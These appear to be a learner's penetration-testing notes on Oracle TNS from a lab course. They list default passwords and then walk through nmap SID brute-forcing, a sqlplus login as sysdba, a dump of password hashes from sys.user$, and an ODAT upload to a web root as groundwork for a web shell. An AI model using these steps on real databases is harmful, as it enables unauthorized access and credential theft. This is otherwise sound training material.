`Oracle Transparent Network Substrate` (`TNS`)

> server communicatin protocol
> supports IPX/SPX and TCP/IP protocol stacks
> used in large, complex databases
> has built in encrpytion
> updated to ipv6 and ssl/tls encrpytion, used for :
> name resoultion, connection management,  load balacing, security


default port : 1521
can be remotely maanged in oracle 8i/9i but not 10g/11g

 default config has some security features, such as basic auth using combiantion of hostnames, ip addresses, usernames and passwords.

The configuration files for Oracle TNS are called `tnsnames.ora` and `listener.ora` and are typically located in the `$ORACLE_HOME/network/admin` directory. The plain text file contains configuration information for Oracle database instances and other network services that use the TNS protocol.

oracle tns is often used with other oracle services

Oracle 9 default password : CHANGE_ON_INSTALL
Oracle 10 has no default password
Oracle DBSNMP default password :dbsnmp
Another example would be that many organizations still use the `finger` service together with Oracle, which can put Oracle's service at risk and make it vulnerable when we have the required knowledge of a home directory.

#### Tnsnames.ora
contains necessery info for clients to connect to service

#### Listener.ora
is a server-side configuration file that defines the listener process's properties and parameters, which is responsible for receiving incoming client requests and forwarding them to the appropriate Oracle database instance.

Oracle databases can be protected by using so-called PL/SQL Exclusion List (`PlsqlExclusionList`). It is a user-created text file that needs to be placed in the `$ORACLE_HOME/sqldeveloper` directory, and it contains the names of PL/SQL packages or types that should be excluded from execution. Once the PL/SQL Exclusion List file is created, it can be loaded into the database instance. It serves as a blacklist that cannot be accessed through the Oracle Application Server.



tools used for enumeration

ODAT - oracle db attacking tool 

odat all -s $IP



```
sudo nmap -p1521 -sV 10.129.204.235 --open
```

nmap bruteforce:

```
sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute
```

we can use the tool `sqlplus` to connect to the Oracle database and interact with it.

```
sqlplus scott/tiger@10.129.204.235/XE
```
https://docs.oracle.com/cd/E11882_01/server.112/e41085/sqlqraa001.htm#SQLQR985

#### Oracle RDBMS - Interaction

```
SQL> select table_name from all_tables;

TABLE_NAME
------------------------------
DUAL
SYSTEM_PRIVILEGE_MAP
TABLE_PRIVILEGE_MAP
STMT_AUDIT_OPTION_MAP
AUDIT_ACTIONS
WRR$_REPLAY_CALL_FILTER
HS_BULKLOAD_VIEW_OBJ
HS$_PARALLEL_METADATA
HS_PARTITION_COL_NAME
HS_PARTITION_COL_TYPE
HELP

<SNIP>


SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO
```


Here, the user `scott` has no administrative privileges. However, we can try using this account to log in as the System Database Admin (`sysdba`), giving us higher privileges. This is possible when the user `scott` has the appropriate privileges typically granted by the database administrator or used by the administrator him/herself.

#### Oracle RDBMS - Database Enumeration

```
sqlplus scott/tiger@10.129.204.235/XE as sysdba
```

We can follow many approaches once we get access to an Oracle database. It highly depends on the information we have and the entire setup. However, we can not add new users or make any modifications. From this point, we could retrieve the password hashes from the `sys.user$` and try to crack them offline. The query for this would look like the following:

#### Oracle RDBMS - Extract Password Hashes

```
SQL> select name, password from sys.user$;

NAME                           PASSWORD
------------------------------ ------------------------------
SYS                            FBA343E7D6C8BC9D
PUBLIC
CONNECT
RESOURCE
DBA
SYSTEM                         B5073FE1DE351687
SELECT_CATALOG_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
OUTLN                          4A3BA55E08595C81
EXP_FULL_DATABASE

NAME                           PASSWORD
------------------------------ ------------------------------
IMP_FULL_DATABASE
LOGSTDBY_ADMINISTRATOR
<SNIP>
```

Another option is to upload a web shell to the target. However, this requires the server to run a web server, and we need to know the exact location of the root directory for the webserver. Nevertheless, if we know what type of system we are dealing with, we can try the default paths, which are:

|**OS**|**Path**|
|---|---|
|Linux|`/var/www/html`|
|Windows|`C:\inetpub\wwwroot`|


#### Oracle RDBMS - File Upload


```
oib3u@htb[/htb]$ echo "Oracle File Upload Test" > testing.txt
oib3u@htb[/htb]$ ./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt

[1] (10.129.204.235:1521): Put the ./testing.txt local file in the C:\inetpub\wwwroot folder like testing.txt on the 10.129.204.235 server                                                                                                  
[+] The ./testing.txt file was created on the C:\inetpub\wwwroot directory on the 10.129.204.235 server like the testing.txt file
```


Finally, we can test if the file upload approach worked with `curl`. Therefore, we will use a `GET http://<IP>` request, or we can visit via browser.

`oib3u@htb[/htb]$ curl -X GET http://10.129.204.235/testing.txt Oracle File Upload Test`